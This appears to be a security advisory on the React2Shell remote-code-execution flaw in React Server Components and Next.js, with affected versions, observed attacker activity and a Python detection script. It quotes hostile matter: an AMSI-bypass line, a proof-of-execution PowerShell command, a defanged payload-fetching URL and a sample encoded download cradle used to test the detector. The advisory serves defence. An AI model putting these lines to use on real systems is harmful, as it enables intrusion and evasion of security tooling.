China-Nexus APTs Rapidly Exploit React2Shell

React2Shell (CVE-2025-55182) is a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components (RSC), reachable through the Flight protocol that RSC uses to serialize data between client and server. The root cause is insecure deserialization: an attacker can send a crafted payload that the server deserializes and executes, with no credentials required. Frameworks that ship RSC, notably Next.js with the App Router, are affected in their default configurations. The vulnerability is being actively exploited in the wild by automated botnets and state-sponsored threat actors, including China-nexus groups.

Severity: Critical

Vulnerability Details

  • CVE ID: CVE-2025-55182 (React); CVE-2025-66478 was assigned to Next.js and later marked as a duplicate
  • Severity: CVSS 10.0 (Critical)
  • Component: react-server in React 19.x, and the copies bundled inside Next.js 15.x/16.x
  • Root Cause: Insecure deserialization in the Flight protocol used by React Server Components
  • Impact: Unauthenticated RCE through a specially crafted HTTP POST request
  • Affected Products:
    • react-server-dom-* packages (the webpack, parcel and turbopack bindings): 19.0.x, 19.1.x, 19.2.x
    • Next.js with App Router: 14.3.0-canary.77 and later canary releases, 15.x, 16.x
  • Fixed Versions:
    • react-server-dom-* packages: 19.0.1, 19.1.2, and 19.2.1
    • Next.js with App Router: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 (14.x stable releases are not affected)

Exploitation Details

  1. Timeline: Amazon threat intelligence, Wiz Research, Datadog, and GreyNoise observed exploitation attempts beginning December 4, 2025, within hours of public disclosure.
  2. Threat Actors: China-nexus APT groups, including Earth Lamia and Jackpot Panda.
  3. Initial Access
    • Attackers send a crafted RSC payload in an HTTP POST to a server endpoint that accepts Flight data.
    • A single request reaches the vulnerable deserialization path; no prior foothold or exploit chain is needed.
    • No authentication is required.
  4. PoE (Proof-of-Execution) Validation
    • Common pattern: powershell -c "40138*41979". The server evaluates the arithmetic and returns the product, which confirms code execution.
    • Leaves minimal logs or artifacts, aiding stealth.
  5. Post-Exploitation
    • Stage 1: Base64-encoded PowerShell payloads launched with powershell -enc.
    • Stage 2: Encoded PowerShell payloads that fetch follow-on scripts from http[:]//23[.]235[.]188[.]3:652/qMqSb (defanged).
    • AMSI bypass via: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
  6. Post-Exploitation Goals
    Once access is gained, observed goals include:
    • Establishing shells to harvest credentials from environment variables, the filesystem, and cloud instance metadata.
    • Identifying AWS credentials and Base64-encoding them for exfiltration.
    • Cryptomining (e.g., dropping the XMRig miner) and attempts to install post-exploitation frameworks such as Sliver.

Recommendations

  1. Update affected React/Next.js applications to the fixed versions listed above. Next.js bundles its own copy of the React server packages, so the Next.js version itself must be upgraded; bumping the react packages in package.json alone does not fix an App Router application. Verify the resolved versions in the lockfile rather than the version ranges in package.json.
  2. Review the permissions and access rights of the user or system account running the React/Next.js server. Minimize access to the filesystem, network resources, and especially cloud metadata services (e.g., the AWS EC2 Instance Metadata Service; enforce IMDSv2 so that credential requests require a session token) to limit the impact of an RCE.
  3. Monitor for:
    • POST requests carrying the next-action or rsc-action-id headers
    • Request bodies containing the patterns $@ and "status":"resolved_model"
    • User agents such as Go-http-client/1.1, Assetnote/1.0.0, Safari 17.2.1, and custom Python scripts
    Note that next-action is also present on legitimate server-action requests, so alert on the combination of header, body pattern, and an unusual client rather than on the header alone.
  4. Alert on powershell.exe / pwsh.exe launched with -enc / -EncodedCommand, or whose command line or decoded payload contains DownloadString( or IEX.
  5. Look for Event ID 4104 (PowerShell script block logging) entries containing AMSI or reflection keywords, such as AmsiUtils or amsiInitFailed.
  6. Block the IOCs at the respective controls; the collection is published at:
    https://www.virustotal.com/gui/collection/e77fd2bbb0d2070967b8462ea95e74e08923069e3ddbef6dc7095a840e6d2da7/iocs
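The monitoring items above (server-action requests, encoded PowerShell, and 4104 script blocks) written as one small triage script. This is an added example for this advisory, not tooling from Ampcus Cyber or from the vendors cited; the point weights are arbitrary, and the action id, host name, paths, and every sample request and event are constructed for illustration.

```python
"""Triage helpers for the React2Shell (CVE-2025-55182) indicators listed above.
Added example, not the advisory author's tooling: scores RSC server-action
requests (HTTP layer) and PowerShell command lines / Event ID 4104 script
blocks (host layer). Every sample request and event is constructed."""
import base64
import binascii
import re
from dataclasses import dataclass, field

RSC_HEADERS = {"next-action", "rsc-action-id"}
BODY_PATTERNS = [
    re.compile(r"\$@"),                              # Flight chunk reference prefix
    re.compile(r'"status"\s*:\s*"resolved_model"'),  # pre-resolved chunk marker
]
# Scanner/exploit user agents named in the advisory; a weak signal on its own.
SUSPECT_UA = re.compile(r"Go-http-client/1\.1|Assetnote/1\.0\.0|Safari 17\.2\.1"
                        r"|python-requests|python-urllib", re.I)
PS_BINARY = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# powershell -c "40138*41979": bare arithmetic used as a proof-of-execution canary
POE_CANARY = re.compile(r'-c(?:ommand)?\s+"?\d{3,}\s*\*\s*\d{3,}"?', re.I)
SUSPICIOUS_PS = [
    (re.compile(r"DownloadString\s*\(", re.I), "download cradle: DownloadString("),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "Invoke-Expression / IEX"),
    (re.compile(r"AmsiUtils|amsiInitFailed", re.I), "AMSI tampering"),
    (re.compile(r"\.GetField\s*\(|\[Ref\]\.Assembly", re.I), "reflection"),
]

@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.reasons.append(reason)

def score_http_request(method: str, headers: dict, body: str) -> Finding:
    """Score one request; header names are matched case-insensitively."""
    f = Finding()
    if method.upper() != "POST":
        return f
    lowered = {k.lower(): v for k, v in headers.items()}
    hits = RSC_HEADERS & set(lowered)
    if hits:  # present on legitimate server actions too, hence the low weight
        f.add(2, "server-action header: " + ", ".join(sorted(hits)))
    for pat in BODY_PATTERNS:
        if pat.search(body):
            f.add(3, "body pattern: " + pat.pattern)
    ua = lowered.get("user-agent", "")
    if SUSPECT_UA.search(ua):
        f.add(1, "user agent: " + ua)
    return f

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE text; '' if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", "replace")
    except (binascii.Error, ValueError):
        return ""

def score_powershell(command_line: str = "", script_block: str = "") -> Finding:
    """Score a process command line (4688 / Sysmon 1) and/or a 4104 script block."""
    f = Finding()
    text = script_block
    if PS_BINARY.search(command_line):
        if POE_CANARY.search(command_line):
            f.add(2, "arithmetic proof-of-execution canary")
        m = ENCODED_FLAG.search(command_line)
        if m:  # match keywords on the decoded text, not on the base64 blob
            f.add(2, "encoded command")
            text += "\n" + decode_encoded_command(m.group(1))
    for pat, label in SUSPICIOUS_PS:
        if pat.search(text):
            f.add(2, label)
    return f

# Constructed samples: hypothetical action id, host name and paths.
ENC_CMD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/q')"
    .encode("utf-16-le")).decode()
SAMPLE_REQUESTS = {
    "exploit_like": ("POST", {"Next-Action": "e1c2d3", "User-Agent": "Go-http-client/1.1"},
                     '["$@0",{"status":"resolved_model","value":"x"}]'),
    "legit_action": ("POST", {"Next-Action": "e1c2d3", "User-Agent": "Mozilla/5.0 Chrome/120"},
                     '[{"name":"alice"}]'),
    "plain_get": ("GET", {"User-Agent": "Go-http-client/1.1"}, ""),
}
SAMPLE_PS = {
    "poe_canary": ('powershell -c "40138*41979"', ""),
    "encoded_cradle": (f"powershell.exe -nop -w hidden -enc {ENC_CMD}", ""),
    "amsi_4104": ("", "[System.Management.Automation.AmsiUtils]::amsiInitFailed = $true"),
    "benign": ("powershell.exe -File C:\\scripts\\backup.ps1", ""),
}

def run_samples() -> dict:
    """Return {sample_name: score} for every constructed sample."""
    out = {n: score_http_request(*r).score for n, r in SAMPLE_REQUESTS.items()}
    out.update({n: score_powershell(*e).score for n, e in SAMPLE_PS.items()})
    return out
```

Two design points. The next-action header and Flight markers such as $@ also appear in legitimate server-action traffic, so the header alone scores low; page an analyst on the combination of header, body pattern, and an unusual client, and tune the weights against your own application's baseline. On the host side the script decodes the -EncodedCommand blob before matching, because the cradle keywords (DownloadString, IEX) are not visible in the raw base64 and a rule that only inspects the literal command line will miss them.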

Sources:

  • https://react2shell.com/
  • https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
  • https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far
  • https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182#which-actions-should-security-teams-take-22
